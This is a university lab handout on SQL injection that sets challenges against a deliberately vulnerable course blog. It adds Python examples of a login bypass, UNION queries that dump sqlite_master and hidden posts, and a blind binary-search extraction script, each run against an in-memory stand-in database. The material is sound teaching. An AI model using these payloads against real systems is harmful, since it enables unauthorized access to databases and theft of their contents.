SQLi
The goal for this lab is to learn the basics of SQLi attacks.
SQL Injection (SQLi) is a vulnerability that may exist in applications that access databases. It is present whenever input provided by an attacker is not validated before being concatenated into a query string: the input becomes part of the statement, so the attacker can change what the database executes. The injected input is usually a small fragment of SQL that completes or alters the statement the application builds.
Although simple, this vulnerability is very powerful, as an attacker may dump all the information in a database (and, depending on the query, change it).
To demonstrate these attacks we will use a purposely ill-developed blog application hosted in our website.
Remember, you should run these challenges inside a VM and you must be in the IST VPN in order to be able to play these challenges.
This problem is running at http://mustard.stt.rnl.tecnico.ulisboa.pt:12101
We will start with a simple problem of direct access to the database and will then move to more complex forms of attack.
Whenever looking for an SQLi we should first find the fields that are injectable.
- Can you find them?
- Ok, can you now log in as the `admin` and read his profile? Look for vulnerabilities in the login form.
Create your own user. DO NOT USE A MEANINGFUL PASSWORD HERE! THIS SITE IS COMPLETELY BROKEN!!!!
We heard that there is a lottery going on that might make you rich. Do you want to be rich? Get the JACKPOT! It is a different one for every player.
- But how, when your tokens are read-only?... It would be so much easier if we could just get more tokens...
- Oh, and by the way, we know that you usually comment out the rest of the line with `--` to bypass some checks. Don't try it here. We are covered on this.
Is there any other interesting information in this website? We have heard that there is a juicy secret blog post yet to be released. Can you find it?
- Are there any other vulnerable input fields? Look for a place where you haven't tried to inject into yet.
- Oh, and it might be useful to have a look at `sqlite_master`. Someone mentioned `tbl_name` and `sql`, but we have no clue what this is.
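The three tricks the hints above point at (a login bypass, getting around the `--` block by re-closing the quote the application opened, and reading `sqlite_master` through a `UNION` in the search bar) are shown below against a constructed in-memory SQLite stand-in for the blog. This is an added example, not the lab's own code: the table and column names (`users`, `posts`, `profile`, `published`) and the shape of the application's queries are assumptions, so the payloads will need adapting to whatever the real queries look like.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the blog's SQLite database.
    Table and column names are assumptions, not the lab's real schema."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT,
                           password TEXT, profile TEXT);
        CREATE TABLE posts(id INTEGER PRIMARY KEY, title TEXT,
                           body TEXT, published INTEGER);
        INSERT INTO users(username, password, profile) VALUES
            ('admin', 'not-the-real-password', 'FLAG{admin-profile}'),
            ('alice', 'hunter2', 'just a user');
        INSERT INTO posts(title, body, published) VALUES
            ('Lorem', 'lorem ipsum', 1),
            ('Upcoming', 'FLAG{unreleased-post}', 0);
    """)
    return db


def vulnerable_login(db, username, password):
    # The bug: attacker-controlled text is concatenated into the statement.
    query = (f"SELECT username, profile FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return db.execute(query).fetchone()


def safe_login(db, username, password):
    # Bound parameters travel as data, so they can never change the query.
    query = "SELECT username, profile FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone()


def vulnerable_search(db, term):
    # Only published posts are meant to be visible through the search bar.
    query = (f"SELECT title, body FROM posts "
             f"WHERE published = 1 AND title LIKE '%{term}%'")
    return db.execute(query).fetchall()


# None of these payloads needs a `--` comment: each one re-closes the quote
# the application opens, so the whole statement still parses.
LOGIN_PAYLOAD = "' OR username='admin"
#   -> ... AND password = '' OR username='admin'   (AND binds tighter than OR)
SCHEMA_PAYLOAD = "' UNION SELECT tbl_name, sql FROM sqlite_master WHERE '%'='"
#   -> ... LIKE '%' UNION SELECT tbl_name, sql FROM sqlite_master WHERE '%'='%'
UNRELEASED_PAYLOAD = "' UNION SELECT title, body FROM posts WHERE published = 0 AND '%'='"


def login_as_admin(db):
    # Empty username: the OR clause alone selects the admin row.
    return vulnerable_login(db, "", LOGIN_PAYLOAD)


def dump_schema(db):
    # sqlite_master.tbl_name / .sql give every table and its CREATE statement;
    # the legitimate search hit is filtered out by the CREATE prefix.
    return {name: sql for name, sql in vulnerable_search(db, SCHEMA_PAYLOAD)
            if sql.startswith("CREATE")}


def read_unreleased(db):
    return vulnerable_search(db, UNRELEASED_PAYLOAD)


if __name__ == "__main__":
    db = build_db()
    print("login bypass   :", login_as_admin(db))
    print("parameterised  :", safe_login(db, "", LOGIN_PAYLOAD))
    for name, sql in dump_schema(db).items():
        print("schema         :", name, "->", sql)
    print("unreleased post:", read_unreleased(db))
```

The `WHERE '%'='` ending is the reusable idea: whatever the application appends after your input (here `%'`) is absorbed into a harmless always-true comparison, which is why the `--` filter does not stop the injection. Once `dump_schema` has listed the real table and column names, the `UNION` payload is rewritten to select from them.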
This problem is running at http://mustard.stt.rnl.tecnico.ulisboa.pt:12102
The admin was in a hurry, but he managed to fix the login and update-profile problems! He just lacked the time to fix the search bar injection... but to prevent it from being exploited, the admin just stopped showing the blog posts.
- Can you still exploit it?
- Is there any other information that can be extracted from the database?
- The `requests` package for Python might be useful for this challenge, as you may need to do some scripting. Look at the example below and some more templates here.
```python
import requests

SERVER = 'http://mustard.stt.rnl.tecnico.ulisboa.pt:12102/'

#### GET REQUESTS
# requests URL-encodes params for you; the injection goes in the 'search' value.
params = {'search': 'lorem'}
headers = {'user-agent': 'my-app/0.0.1', 'Content-Type': 'application/json'}
r = requests.get(SERVER, params=params, headers=headers)

#### ANSWERS
print('status  : ', r.status_code)
print('headers : ', r.headers)
print('cookies : ', r.cookies)
print('html    : ', r.text)
```
This Task is just the case-sensitive version of Task 2.1.
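When the page no longer shows the posts, each request still leaks one bit: whether the search matched anything. The added example below (not the lab's code) simulates that for Task 2.1 with a constructed in-memory database and extracts a hidden value with a binary search on `unicode(substr(...))`, which costs about eight requests per character. It also shows the caveat that matters for the case-sensitive variant: SQLite's `LIKE` is case-insensitive for ASCII, so a `LIKE`-based probe cannot tell `f` from `F`, whereas `=` (or the `unicode()` comparison used here) recovers the exact case. The `posts` and `vault` tables, the `secret` column and the query shape are assumptions; in the real lab the `BlindSearch.has_results` call is replaced by a `requests.get()` whose response you classify as "found something" or not.

```python
import sqlite3


def build_task21_db():
    """Constructed stand-in for the Task 2.1 database (names are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE posts(title TEXT);
        CREATE TABLE vault(secret TEXT);
        INSERT INTO posts VALUES ('Lorem ipsum');
        INSERT INTO vault VALUES ('Flag{CaSe-MaTtErS}');
    """)
    return db


class BlindSearch:
    """Simulates the web application: the search is still injectable, but the
    caller only learns whether the query returned any rows."""

    def __init__(self, db):
        self.db = db
        self.requests = 0  # counts how many "HTTP requests" the attack needs

    def has_results(self, term):
        self.requests += 1
        query = f"SELECT title FROM posts WHERE title LIKE '%{term}%'"
        return len(self.db.execute(query).fetchall()) > 0


def oracle(app, condition):
    # Inject a boolean condition and re-close the quote the app opened, so the
    # app's trailing %' becomes the harmless comparison '%'='%'.
    return app.has_results(f"' AND ({condition}) AND '%'='")


def extract_int(app, expr, lo=0, hi=255):
    # Binary search on `expr > mid`: 8 requests for a value in 0..255 instead
    # of up to 256 linear guesses.
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(app, f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_secret(app):
    # First the length, then every character by its code point (case exact).
    length = extract_int(app, "SELECT length(secret) FROM vault")
    chars = [chr(extract_int(app, f"SELECT unicode(substr(secret, {i}, 1)) FROM vault"))
             for i in range(1, length + 1)]
    return "".join(chars)


def like_probe(app, pos, ch):
    # LIKE is case-insensitive for ASCII in SQLite: 'f' and 'F' both match.
    return oracle(app, f"SELECT substr(secret, {pos}, 1) LIKE '{ch}' FROM vault")


def eq_probe(app, pos, ch):
    # `=` compares the actual bytes, so only the correct case matches.
    return oracle(app, f"SELECT substr(secret, {pos}, 1) = '{ch}' FROM vault")


if __name__ == "__main__":
    app = BlindSearch(build_task21_db())
    print("secret   :", extract_secret(app), "in", app.requests, "requests")
    print("LIKE 'f' :", like_probe(app, 1, "f"), " LIKE 'F':", like_probe(app, 1, "F"))
    print("=    'f' :", eq_probe(app, 1, "f"), " =    'F':", eq_probe(app, 1, "F"))
```

If the application's response is a timing difference rather than a visible change, the same `oracle` function works unchanged with the condition wrapped so that a true branch takes measurably longer; only the classification of `has_results` changes.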